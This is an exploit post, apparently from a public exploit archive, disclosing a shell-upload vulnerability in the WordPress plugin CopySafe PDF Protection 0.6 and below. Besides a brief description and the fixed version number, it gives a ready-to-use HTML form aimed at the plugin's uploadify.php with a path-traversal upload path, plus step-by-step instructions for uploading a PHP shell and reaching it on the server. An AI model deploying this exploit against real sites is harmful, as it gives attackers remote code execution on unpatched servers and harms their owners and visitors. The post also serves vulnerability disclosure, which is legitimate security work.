Home / exploits WordPress CopySafe PDF Protection 0.6 Shell Upload
Posted on 15 July 2014
################################################################################################## #Exploit Title : Wordpress Plugin CopySafe PDF Protection Shell Upload vulnerability #Author : Jagriti Sahu #Download Link : http://wordpress.org/support/plugin/wp-copysafe-pdf #version affected : 0.6 and below #Date : 14/07/2014 #Discovered at : IndiShell Lab #Love to : Surbhi, Mradula and Harry ################################################################################################## //////////////////////// /// Overview: //////////////////////// Wordpress Plugin CopySafe PDF Protection(upto version 0.6) suffers from unrestricted file upload vulnerability which allow an attacker to upload malecious php shell on server. to avaid exploitation , update plugin to version 0.7 /////////////////////////////// // Vulnerability Description: /////////////////////////////// vulnerability is due to lib/uploadify/uploadify.php file in which there is no check during file upload attacker need to forward file upload request to this file with PHP shell and file upload path /////////////////////// /// exploit code //// /////////////////////// <form action="http://website.com/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php" method="post" enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="wpcsp_file" ><br> <input type=text name="upload_path" value="../../../../uploads/"> <input type="submit" name="submit" value="Submit"> </form> save this code on you machine as exploit.html open exploit.html into webbrowser, brows your php shell and click submit button shell will be uploaded in uploads directory http://website.com/wp-content/uploads/shell.php
